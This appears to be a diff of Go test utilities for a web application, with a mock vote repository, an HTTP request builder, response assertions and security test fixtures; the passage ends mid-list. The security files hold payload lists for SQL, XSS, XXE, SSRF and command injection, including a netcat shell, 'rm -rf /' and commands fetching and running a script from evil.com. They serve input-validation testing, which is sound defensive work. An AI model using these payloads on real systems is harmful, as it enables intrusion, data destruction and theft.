func NewMockVoteRepository() *MockVoteRepository {
|
||||
return &MockVoteRepository{
|
||||
votes: make(map[uint]*database.Vote),
|
||||
byUserPost: make(map[string]*database.Vote),
|
||||
nextID: 1,
|
||||
}
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) Create(vote *database.Vote) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if m.createErr != nil {
|
||||
return m.createErr
|
||||
}
|
||||
|
||||
var key string
|
||||
if vote.UserID != nil {
|
||||
key = m.key(*vote.UserID, vote.PostID)
|
||||
} else {
|
||||
key = fmt.Sprintf("anon-%d", vote.PostID)
|
||||
}
|
||||
if existingVote, exists := m.byUserPost[key]; exists {
|
||||
existingVote.Type = vote.Type
|
||||
existingVote.UpdatedAt = vote.UpdatedAt
|
||||
vote.ID = existingVote.ID
|
||||
return nil
|
||||
}
|
||||
|
||||
vote.ID = m.nextID
|
||||
m.nextID++
|
||||
|
||||
voteCopy := *vote
|
||||
m.votes[vote.ID] = &voteCopy
|
||||
m.byUserPost[key] = &voteCopy
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) CreateOrUpdate(vote *database.Vote) error {
|
||||
return m.Create(vote)
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) GetByID(id uint) (*database.Vote, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
if vote, ok := m.votes[id]; ok {
|
||||
voteCopy := *vote
|
||||
return &voteCopy, nil
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) GetByUserAndPost(userID, postID uint) (*database.Vote, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
key := m.key(userID, postID)
|
||||
if vote, ok := m.byUserPost[key]; ok {
|
||||
voteCopy := *vote
|
||||
return &voteCopy, nil
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) GetByVoteHash(voteHash string) (*database.Vote, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
for _, vote := range m.votes {
|
||||
if vote.VoteHash != nil && *vote.VoteHash == voteHash {
|
||||
voteCopy := *vote
|
||||
return &voteCopy, nil
|
||||
}
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) GetByPostID(postID uint) ([]database.Vote, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
var votes []database.Vote
|
||||
for _, vote := range m.votes {
|
||||
if vote.PostID == postID {
|
||||
votes = append(votes, *vote)
|
||||
}
|
||||
}
|
||||
return votes, nil
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) GetByUserID(userID uint) ([]database.Vote, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
var votes []database.Vote
|
||||
for _, vote := range m.votes {
|
||||
if vote.UserID != nil && *vote.UserID == userID {
|
||||
votes = append(votes, *vote)
|
||||
}
|
||||
}
|
||||
return votes, nil
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) Update(vote *database.Vote) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if m.updateErr != nil {
|
||||
return m.updateErr
|
||||
}
|
||||
|
||||
if _, ok := m.votes[vote.ID]; !ok {
|
||||
return gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
voteCopy := *vote
|
||||
m.votes[vote.ID] = &voteCopy
|
||||
var key string
|
||||
if vote.UserID != nil {
|
||||
key = m.key(*vote.UserID, vote.PostID)
|
||||
} else {
|
||||
key = fmt.Sprintf("anon-%d", vote.PostID)
|
||||
}
|
||||
m.byUserPost[key] = &voteCopy
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) Delete(id uint) error {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
|
||||
if m.DeleteErr != nil {
|
||||
return m.DeleteErr
|
||||
}
|
||||
|
||||
if vote, ok := m.votes[id]; ok {
|
||||
delete(m.votes, id)
|
||||
var key string
|
||||
if vote.UserID != nil {
|
||||
key = m.key(*vote.UserID, vote.PostID)
|
||||
} else {
|
||||
key = fmt.Sprintf("anon-%d", vote.PostID)
|
||||
}
|
||||
delete(m.byUserPost, key)
|
||||
return nil
|
||||
}
|
||||
return gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) CountByPostID(postID uint) (int64, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
count := int64(0)
|
||||
for _, vote := range m.votes {
|
||||
if vote.PostID == postID {
|
||||
count++
|
||||
}
|
||||
}
|
||||
return count, nil
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) CountByUserID(userID uint) (int64, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
count := int64(0)
|
||||
for _, vote := range m.votes {
|
||||
if vote.UserID != nil && *vote.UserID == userID {
|
||||
count++
|
||||
}
|
||||
}
|
||||
return count, nil
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) Count() (int64, error) {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
return int64(len(m.votes)), nil
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) WithTx(tx *gorm.DB) repositories.VoteRepository {
|
||||
return m
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) key(userID, postID uint) string {
|
||||
return fmt.Sprintf("%d-%d", userID, postID)
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) SetCreateError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.createErr = err
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) SetUpdateError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.updateErr = err
|
||||
}
|
||||
|
||||
func (m *MockVoteRepository) SetDeleteError(err error) {
|
||||
m.mu.Lock()
|
||||
defer m.mu.Unlock()
|
||||
m.deleteErr = err
|
||||
}
|
||||
125
internal/testutils/request_builder.go
Normal file
125
internal/testutils/request_builder.go
Normal file
@@ -0,0 +1,125 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"maps"
|
||||
"net/http"
|
||||
)
|
||||
|
||||
const (
|
||||
StandardUserAgent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
|
||||
StandardAcceptEncoding = "gzip"
|
||||
)
|
||||
|
||||
type RequestBuilder struct {
|
||||
method string
|
||||
url string
|
||||
body io.Reader
|
||||
headers map[string]string
|
||||
withAuth bool
|
||||
authToken string
|
||||
withJSON bool
|
||||
jsonData any
|
||||
withStdHeaders bool
|
||||
withIP bool
|
||||
ipAddress string
|
||||
}
|
||||
|
||||
func NewRequestBuilder(method, url string) *RequestBuilder {
|
||||
return &RequestBuilder{
|
||||
method: method,
|
||||
url: url,
|
||||
headers: make(map[string]string),
|
||||
withStdHeaders: true,
|
||||
}
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) WithBody(body io.Reader) *RequestBuilder {
|
||||
rb.body = body
|
||||
return rb
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) WithJSONBody(data any) *RequestBuilder {
|
||||
rb.withJSON = true
|
||||
rb.jsonData = data
|
||||
return rb
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) WithHeader(key, value string) *RequestBuilder {
|
||||
rb.headers[key] = value
|
||||
return rb
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) WithHeaders(headers map[string]string) *RequestBuilder {
|
||||
maps.Copy(rb.headers, headers)
|
||||
return rb
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) WithAuth(token string) *RequestBuilder {
|
||||
rb.withAuth = true
|
||||
rb.authToken = token
|
||||
return rb
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) WithIP(ipAddress string) *RequestBuilder {
|
||||
rb.withIP = true
|
||||
rb.ipAddress = ipAddress
|
||||
return rb
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) WithoutStandardHeaders() *RequestBuilder {
|
||||
rb.withStdHeaders = false
|
||||
return rb
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) Build() (*http.Request, error) {
|
||||
var body io.Reader = rb.body
|
||||
if rb.withJSON && rb.jsonData != nil {
|
||||
jsonBytes, err := json.Marshal(rb.jsonData)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to marshal JSON body: %w", err)
|
||||
}
|
||||
body = bytes.NewReader(jsonBytes)
|
||||
}
|
||||
request, err := http.NewRequest(rb.method, rb.url, body)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to create request: %w", err)
|
||||
}
|
||||
if rb.withStdHeaders {
|
||||
request.Header.Set("User-Agent", StandardUserAgent)
|
||||
request.Header.Set("Accept-Encoding", StandardAcceptEncoding)
|
||||
}
|
||||
if rb.withJSON {
|
||||
request.Header.Set("Content-Type", "application/json")
|
||||
}
|
||||
if rb.withAuth && rb.authToken != "" {
|
||||
request.Header.Set("Authorization", "Bearer "+rb.authToken)
|
||||
}
|
||||
if rb.withIP && rb.ipAddress != "" {
|
||||
request.Header.Set("X-Forwarded-For", rb.ipAddress)
|
||||
}
|
||||
for key, value := range rb.headers {
|
||||
request.Header.Set(key, value)
|
||||
}
|
||||
return request, nil
|
||||
}
|
||||
|
||||
func (rb *RequestBuilder) BuildOrFatal(t TestingT) *http.Request {
|
||||
req, err := rb.Build()
|
||||
if err != nil {
|
||||
if h, ok := t.(interface{ Helper() }); ok {
|
||||
h.Helper()
|
||||
}
|
||||
t.Fatalf("RequestBuilder.Build failed: %v", err)
|
||||
}
|
||||
return req
|
||||
}
|
||||
|
||||
type TestingT interface {
|
||||
Helper()
|
||||
Errorf(format string, args ...any)
|
||||
Fatalf(format string, args ...any)
|
||||
}
|
||||
194
internal/testutils/response_assertions.go
Normal file
194
internal/testutils/response_assertions.go
Normal file
@@ -0,0 +1,194 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"compress/gzip"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
"strings"
|
||||
)
|
||||
|
||||
func AssertStatusCode(t TestingT, resp *http.Response, expected int) {
|
||||
t.Helper()
|
||||
if resp.StatusCode != expected {
|
||||
var bodyPreview string
|
||||
if resp.Body != nil {
|
||||
bodyBytes := make([]byte, 512)
|
||||
n, _ := resp.Body.Read(bodyBytes)
|
||||
bodyPreview = string(bodyBytes[:n])
|
||||
if seeker, ok := resp.Body.(io.Seeker); ok {
|
||||
seeker.Seek(0, io.SeekStart)
|
||||
}
|
||||
}
|
||||
t.Errorf("Expected status code %d, got %d. Response preview: %s", expected, resp.StatusCode, bodyPreview)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertStatusCodeFatal(t TestingT, resp *http.Response, expected int) {
|
||||
t.Helper()
|
||||
if resp.StatusCode != expected {
|
||||
var bodyPreview string
|
||||
if resp.Body != nil {
|
||||
bodyBytes := make([]byte, 512)
|
||||
n, _ := resp.Body.Read(bodyBytes)
|
||||
bodyPreview = string(bodyBytes[:n])
|
||||
}
|
||||
t.Fatalf("Expected status code %d, got %d. Response preview: %s", expected, resp.StatusCode, bodyPreview)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertE2EJSONResponse(t TestingT, resp *http.Response) (*APIResponse, error) {
|
||||
t.Helper()
|
||||
var reader io.Reader = resp.Body
|
||||
if resp.Header.Get("Content-Encoding") == "gzip" {
|
||||
gzReader, err := gzip.NewReader(resp.Body)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to create gzip reader: %w", err)
|
||||
}
|
||||
defer gzReader.Close()
|
||||
reader = gzReader
|
||||
}
|
||||
var apiResp APIResponse
|
||||
if err := json.NewDecoder(reader).Decode(&apiResp); err != nil {
|
||||
if resp.Body != nil {
|
||||
bodyBytes := make([]byte, 1024)
|
||||
n, _ := resp.Body.Read(bodyBytes)
|
||||
return nil, fmt.Errorf("failed to decode JSON response: %w. Body preview: %s", err, string(bodyBytes[:n]))
|
||||
}
|
||||
return nil, fmt.Errorf("failed to decode JSON response: %w", err)
|
||||
}
|
||||
return &apiResp, nil
|
||||
}
|
||||
|
||||
func AssertE2ESuccessResponse(t TestingT, resp *http.Response, expectedStatus int) {
|
||||
t.Helper()
|
||||
AssertStatusCode(t, resp, expectedStatus)
|
||||
apiResp, err := AssertE2EJSONResponse(t, resp)
|
||||
if err != nil {
|
||||
t.Errorf("Failed to decode JSON response: %v", err)
|
||||
return
|
||||
}
|
||||
if !apiResp.Success {
|
||||
t.Errorf("Expected response to indicate success (success: true), got success: false. Message: %s", apiResp.Message)
|
||||
if apiResp.Data != nil {
|
||||
t.Errorf("Response data: %v", apiResp.Data)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func AssertE2ESuccessResponseFatal(t TestingT, resp *http.Response, expectedStatus int) {
|
||||
t.Helper()
|
||||
if resp.StatusCode != expectedStatus {
|
||||
var bodyPreview string
|
||||
if resp.Body != nil {
|
||||
bodyBytes := make([]byte, 512)
|
||||
n, _ := resp.Body.Read(bodyBytes)
|
||||
bodyPreview = string(bodyBytes[:n])
|
||||
}
|
||||
t.Fatalf("Expected status code %d, got %d. Response preview: %s", expectedStatus, resp.StatusCode, bodyPreview)
|
||||
}
|
||||
apiResp, err := AssertE2EJSONResponse(t, resp)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to decode JSON response: %v", err)
|
||||
}
|
||||
if !apiResp.Success {
|
||||
t.Fatalf("Expected response to indicate success (success: true), got success: false. Message: %s", apiResp.Message)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertE2EErrorResponse(t TestingT, resp *http.Response, expectedStatus int, errorPattern string) {
|
||||
t.Helper()
|
||||
if resp.StatusCode < 400 {
|
||||
t.Errorf("Expected error status code (4xx or 5xx), got %d", resp.StatusCode)
|
||||
}
|
||||
if expectedStatus > 0 && resp.StatusCode != expectedStatus {
|
||||
t.Errorf("Expected error status code %d, got %d", expectedStatus, resp.StatusCode)
|
||||
}
|
||||
apiResp, err := AssertE2EJSONResponse(t, resp)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
if apiResp.Success {
|
||||
t.Errorf("Expected error response (success: false), got success: true")
|
||||
}
|
||||
if errorPattern != "" {
|
||||
var errorMsg string
|
||||
if errorField, ok := getErrorField(apiResp); ok {
|
||||
errorMsg = errorField
|
||||
} else if apiResp.Message != "" {
|
||||
errorMsg = apiResp.Message
|
||||
}
|
||||
if errorMsg == "" {
|
||||
t.Errorf("Expected error message containing '%s', but no error message found in response", errorPattern)
|
||||
} else if !strings.Contains(strings.ToLower(errorMsg), strings.ToLower(errorPattern)) {
|
||||
t.Errorf("Expected error message to contain '%s', got: %s", errorPattern, errorMsg)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func AssertE2EErrorResponseFatal(t TestingT, resp *http.Response, expectedStatus int, errorPattern string) {
|
||||
t.Helper()
|
||||
if expectedStatus > 0 && resp.StatusCode != expectedStatus {
|
||||
var bodyPreview string
|
||||
if resp.Body != nil {
|
||||
bodyBytes := make([]byte, 512)
|
||||
n, _ := resp.Body.Read(bodyBytes)
|
||||
bodyPreview = string(bodyBytes[:n])
|
||||
}
|
||||
t.Fatalf("Expected error status code %d, got %d. Response preview: %s", expectedStatus, resp.StatusCode, bodyPreview)
|
||||
}
|
||||
apiResp, err := AssertE2EJSONResponse(t, resp)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
if apiResp.Success {
|
||||
t.Fatalf("Expected error response (success: false), got success: true")
|
||||
}
|
||||
if errorPattern != "" {
|
||||
var errorMsg string
|
||||
if errorField, ok := getErrorField(apiResp); ok {
|
||||
errorMsg = errorField
|
||||
} else if apiResp.Message != "" {
|
||||
errorMsg = apiResp.Message
|
||||
}
|
||||
if errorMsg == "" {
|
||||
t.Fatalf("Expected error message containing '%s', but no error message found in response", errorPattern)
|
||||
} else if !strings.Contains(strings.ToLower(errorMsg), strings.ToLower(errorPattern)) {
|
||||
t.Fatalf("Expected error message to contain '%s', got: %s", errorPattern, errorMsg)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func getErrorField(resp *APIResponse) (string, bool) {
|
||||
if resp == nil {
|
||||
return "", false
|
||||
}
|
||||
if dataMap, ok := resp.Data.(map[string]interface{}); ok {
|
||||
if errorVal, ok := dataMap["error"].(string); ok {
|
||||
return errorVal, true
|
||||
}
|
||||
}
|
||||
if resp.Message != "" {
|
||||
return resp.Message, true
|
||||
}
|
||||
return "", false
|
||||
}
|
||||
|
||||
func ReadResponseBody(t TestingT, resp *http.Response) (string, error) {
|
||||
t.Helper()
|
||||
var reader io.Reader = resp.Body
|
||||
if resp.Header.Get("Content-Encoding") == "gzip" {
|
||||
gzReader, err := gzip.NewReader(resp.Body)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("failed to create gzip reader: %w", err)
|
||||
}
|
||||
defer gzReader.Close()
|
||||
reader = gzReader
|
||||
}
|
||||
bodyBytes, err := io.ReadAll(reader)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("failed to read response body: %w", err)
|
||||
}
|
||||
return string(bodyBytes), nil
|
||||
}
|
||||
259
internal/testutils/security.go
Normal file
259
internal/testutils/security.go
Normal file
@@ -0,0 +1,259 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"crypto/sha256"
|
||||
"encoding/hex"
|
||||
"math/big"
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
type MaliciousInputs struct {
|
||||
SQLInjection []string
|
||||
XSSPayloads []string
|
||||
PathTraversal []string
|
||||
CommandInjection []string
|
||||
LDAPInjection []string
|
||||
NoSQLInjection []string
|
||||
CSRFPayloads []string
|
||||
XXE []string
|
||||
SSRF []string
|
||||
BufferOverflow []string
|
||||
FormatString []string
|
||||
Unicode []string
|
||||
Encoding []string
|
||||
}
|
||||
|
||||
func GetMaliciousInputs() *MaliciousInputs {
|
||||
return &MaliciousInputs{
|
||||
SQLInjection: []string{
|
||||
"'; DROP TABLE users; --",
|
||||
"' OR '1'='1",
|
||||
"' UNION SELECT * FROM users --",
|
||||
"'; INSERT INTO users VALUES ('hacker', 'hacker@evil.com', 'password'); --",
|
||||
"' OR 1=1 --",
|
||||
"admin'--",
|
||||
"admin'/*",
|
||||
"' OR 'x'='x",
|
||||
"' AND id IS NULL; --",
|
||||
"'; EXEC xp_cmdshell('dir'); --",
|
||||
"' UNION SELECT password FROM users WHERE username='admin' --",
|
||||
"1'; DELETE FROM users; --",
|
||||
"' OR 'a'='a",
|
||||
"'; UPDATE users SET password='hacked' WHERE username='admin'; --",
|
||||
"' OR EXISTS(SELECT * FROM users WHERE username='admin') --",
|
||||
},
|
||||
XSSPayloads: []string{
|
||||
"<script>alert('XSS')</script>",
|
||||
"<img src=x onerror=alert('XSS')>",
|
||||
"<svg onload=alert('XSS')>",
|
||||
"javascript:alert('XSS')",
|
||||
"<iframe src=javascript:alert('XSS')></iframe>",
|
||||
"<body onload=alert('XSS')>",
|
||||
"<input onfocus=alert('XSS') autofocus>",
|
||||
"<select onfocus=alert('XSS') autofocus>",
|
||||
"<textarea onfocus=alert('XSS') autofocus>",
|
||||
"<keygen onfocus=alert('XSS') autofocus>",
|
||||
"<video><source onerror=alert('XSS')>",
|
||||
"<audio src=x onerror=alert('XSS')>",
|
||||
"<details open ontoggle=alert('XSS')>",
|
||||
"<marquee onstart=alert('XSS')>",
|
||||
"<math><mi//xlink:href=data:x,<script>alert('XSS')</script>",
|
||||
},
|
||||
PathTraversal: []string{
|
||||
"../../../etc/passwd",
|
||||
"..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
|
||||
"....//....//....//etc/passwd",
|
||||
"..%2F..%2F..%2Fetc%2Fpasswd",
|
||||
"..%252F..%252F..%252Fetc%252Fpasswd",
|
||||
"..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
|
||||
"..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd",
|
||||
"..%255c..%255c..%255cetc%255cpasswd",
|
||||
"..%2e%2e%2f..%2e%2e%2f..%2e%2e%2fetc%2fpasswd",
|
||||
"..%252e%252e%252f..%252e%252e%252f..%252e%252e%252fetc%252fpasswd",
|
||||
},
|
||||
CommandInjection: []string{
|
||||
"; ls -la",
|
||||
"| cat /etc/passwd",
|
||||
"&& whoami",
|
||||
"|| id",
|
||||
"`whoami`",
|
||||
"$(whoami)",
|
||||
"; rm -rf /",
|
||||
"| nc -l -p 4444 -e /bin/sh",
|
||||
"&& wget http://evil.com/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh",
|
||||
"|| curl http://evil.com/shell.sh | sh",
|
||||
},
|
||||
LDAPInjection: []string{
|
||||
"*)(uid=*))(|(uid=*",
|
||||
"*)(|(password=*))",
|
||||
"*)(|(objectClass=*))",
|
||||
"*)(|(mail=*))",
|
||||
"*)(|(cn=*))",
|
||||
"*)(|(sn=*))",
|
||||
"*)(|(givenName=*))",
|
||||
"*)(|(telephoneNumber=*))",
|
||||
"*)(|(userPassword=*))",
|
||||
"*)(|(description=*))",
|
||||
},
|
||||
NoSQLInjection: []string{
|
||||
"{\"$where\": \"this.username == this.password\"}",
|
||||
"{\"$ne\": null}",
|
||||
"{\"$gt\": \"\"}",
|
||||
"{\"$regex\": \".*\"}",
|
||||
"{\"$exists\": true}",
|
||||
"{\"$or\": [{\"username\": \"admin\"}, {\"password\": \"admin\"}]}",
|
||||
"{\"$and\": [{\"username\": {\"$ne\": null}}, {\"password\": {\"$ne\": null}}]}",
|
||||
"{\"username\": {\"$in\": [\"admin\", \"root\", \"administrator\"]}}",
|
||||
"{\"$where\": \"function() { return this.username == this.password; }\"}",
|
||||
"{\"$where\": \"this.username.match(/.*/)\"}",
|
||||
},
|
||||
CSRFPayloads: []string{
|
||||
"<form action=\"http://target.com/transfer\" method=\"POST\"><input type=\"hidden\" name=\"amount\" value=\"1000\"><input type=\"hidden\" name=\"to\" value=\"attacker\"><input type=\"submit\" value=\"Click me\"></form>",
|
||||
"<img src=\"http://target.com/transfer?amount=1000&to=attacker\">",
|
||||
"<iframe src=\"http://target.com/transfer?amount=1000&to=attacker\"></iframe>",
|
||||
"<script>fetch('http://target.com/transfer', {method: 'POST', body: 'amount=1000&to=attacker'})</script>",
|
||||
"<link rel=\"stylesheet\" href=\"http://target.com/transfer?amount=1000&to=attacker\">",
|
||||
},
|
||||
XXE: []string{
|
||||
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
|
||||
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://evil.com/xxe\">]><foo>&xxe;</foo>",
|
||||
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///c:/windows/system32/drivers/etc/hosts\">]><foo>&xxe;</foo>",
|
||||
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"php://filter/read=convert.base64-encode/resource=index.php\">]><foo>&xxe;</foo>",
|
||||
"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"data://text/plain;base64,PHBocCBwaHBpbmZvKCk7ID8+\">]><foo>&xxe;</foo>",
|
||||
},
|
||||
SSRF: []string{
|
||||
"http://localhost:22",
|
||||
"http://127.0.0.1:22",
|
||||
"http://0.0.0.0:22",
|
||||
"http://[::1]:22",
|
||||
"http://169.254.169.254/",
|
||||
"http://metadata.google.internal/",
|
||||
"http://169.254.169.254/latest/meta-data/",
|
||||
"http://169.254.169.254/latest/user-data/",
|
||||
"http://169.254.169.254/latest/security-credentials/",
|
||||
"file:///etc/passwd",
|
||||
"file:///c:/windows/system32/drivers/etc/hosts",
|
||||
"gopher://127.0.0.1:22",
|
||||
"dict://127.0.0.1:22",
|
||||
"ldap://127.0.0.1:389",
|
||||
},
|
||||
BufferOverflow: []string{
|
||||
strings.Repeat("A", 1000),
|
||||
strings.Repeat("B", 10000),
|
||||
strings.Repeat("C", 100000),
|
||||
strings.Repeat("D", 1000000),
|
||||
strings.Repeat("E", 10000000),
|
||||
},
|
||||
FormatString: []string{
|
||||
"%x%x%x%x%x%x%x%x%x%x",
|
||||
"%p%p%p%p%p%p%p%p%p%p",
|
||||
"%s%s%s%s%s%s%s%s%s%s",
|
||||
"%n%n%n%n%n%n%n%n%n%n",
|
||||
"%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x",
|
||||
"%08p%08p%08p%08p%08p%08p%08p%08p%08p%08p",
|
||||
},
|
||||
Unicode: []string{
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
},
|
||||
Encoding: []string{
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
"<script>alert('XSS')</script>",
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func GenerateSecureRandomString(length int) (string, error) {
|
||||
const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
|
||||
b := make([]byte, length)
|
||||
for i := range b {
|
||||
num, err := rand.Int(rand.Reader, big.NewInt(int64(len(charset))))
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
b[i] = charset[num.Int64()]
|
||||
}
|
||||
return string(b), nil
|
||||
}
|
||||
|
||||
func GenerateSecurePassword(length int) (string, error) {
|
||||
const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|;:,.<>?"
|
||||
b := make([]byte, length)
|
||||
for i := range b {
|
||||
num, err := rand.Int(rand.Reader, big.NewInt(int64(len(charset))))
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
b[i] = charset[num.Int64()]
|
||||
}
|
||||
return string(b), nil
|
||||
}
|
||||
|
||||
func HashVerificationToken(token string) string {
|
||||
sum := sha256.Sum256([]byte(token))
|
||||
return hex.EncodeToString(sum[:])
|
||||
}
|
||||
|
||||
func AssertNoSQLInjection(t *testing.T, field string, value string, expectedError bool) {
|
||||
t.Helper()
|
||||
|
||||
if strings.Contains(strings.ToLower(value), "drop table") {
|
||||
if !expectedError {
|
||||
t.Errorf("Expected SQL injection to be detected for field %s with value %s", field, value)
|
||||
}
|
||||
} else if expectedError {
|
||||
t.Errorf("Expected SQL injection error for field %s with value %s", field, value)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertNoXSS(t *testing.T, field string, value string, expectedError bool) {
|
||||
t.Helper()
|
||||
|
||||
if strings.Contains(value, "<script>") {
|
||||
if !expectedError {
|
||||
t.Errorf("Expected XSS to be detected for field %s with value %s", field, value)
|
||||
}
|
||||
} else if expectedError {
|
||||
t.Errorf("Expected XSS error for field %s with value %s", field, value)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertNoPathTraversal(t *testing.T, field string, value string, expectedError bool) {
|
||||
t.Helper()
|
||||
|
||||
if strings.Contains(value, "../") || strings.Contains(value, "..\\") {
|
||||
if !expectedError {
|
||||
t.Errorf("Expected path traversal to be detected for field %s with value %s", field, value)
|
||||
}
|
||||
} else if expectedError {
|
||||
t.Errorf("Expected path traversal error for field %s with value %s", field, value)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertValidationError(t *testing.T, field string, value string, expectedError bool, err error) {
|
||||
t.Helper()
|
||||
|
||||
if expectedError && err == nil {
|
||||
t.Errorf("Expected validation error for %s field with value %s", field, value)
|
||||
} else if !expectedError && err != nil {
|
||||
t.Errorf("Unexpected validation error for %s field: %v", field, err)
|
||||
}
|
||||
}
|
||||
42
internal/testutils/security_payloads.go
Normal file
42
internal/testutils/security_payloads.go
Normal file
@@ -0,0 +1,42 @@
|
||||
package testutils
|
||||
|
||||
var SQLInjectionPayloads = []string{
|
||||
"'; DROP TABLE users; --",
|
||||
"' OR '1'='1",
|
||||
"' UNION SELECT * FROM users--",
|
||||
"1' OR '1'='1",
|
||||
"' OR 1=1--",
|
||||
"' OR 1=1#",
|
||||
"' OR '1'='1'--",
|
||||
"admin'--",
|
||||
"admin'/*",
|
||||
"' OR 1=1 LIMIT 1 --'",
|
||||
"') OR ('1'='1",
|
||||
"' OR 'x'='x",
|
||||
"' AND 1=1--",
|
||||
"' AND 1=2--",
|
||||
"1' AND '1'='1",
|
||||
}
|
||||
|
||||
var XSSPayloads = []string{
|
||||
"<script>alert('XSS')</script>",
|
||||
"<img src=x onerror=alert('XSS')>",
|
||||
"<svg onload=alert('XSS')>",
|
||||
"javascript:alert('XSS')",
|
||||
